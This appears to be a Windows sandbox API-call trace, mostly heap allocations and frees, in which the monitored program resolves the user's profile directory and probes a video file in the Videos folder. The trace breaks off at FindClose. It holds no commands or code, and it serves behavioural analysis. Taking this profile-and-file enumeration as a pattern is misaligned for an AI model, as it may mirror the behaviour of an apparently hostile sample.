[0257.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0257.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0257.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0257.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0257.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0257.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0257.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0257.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0257.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0257.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0257.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0257.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0257.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0257.033] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0257.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0257.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0257.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0257.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0257.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0257.033] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0257.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0257.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0257.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0257.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0257.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0257.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0257.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0257.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0257.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0257.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0257.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0257.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0257.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa898 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0257.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0257.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0257.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0257.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0257.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0257.036] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0257.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.037] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0257.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0257.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0257.037] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0257.038] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0257.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0257.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0257.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0257.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0257.039] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0257.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0257.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0257.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0257.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0257.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0257.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0257.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0257.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0257.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0257.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0257.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0257.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0257.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0257.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0257.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0257.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.041] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0257.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0257.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0257.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0257.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0257.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0257.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0257.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.042] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0257.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0257.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0257.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0257.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0257.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0257.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0257.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.043] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/4Qauyoz6.avi", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1f1edd0, ftCreationTime.dwHighDateTime=0x1d4ca4c, ftLastAccessTime.dwLowDateTime=0xa3ba3090, ftLastAccessTime.dwHighDateTime=0x1d4d026, ftLastWriteTime.dwLowDateTime=0xa3ba3090, ftLastWriteTime.dwHighDateTime=0x1d4d026, nFileSizeHigh=0x0, nFileSizeLow=0xa6ab, dwReserved0=0x830530, dwReserved1=0xf683, cFileName="4Qauyoz6.avi", cAlternateFileName="")) returned 0xaa5960 [0257.043] FindClose 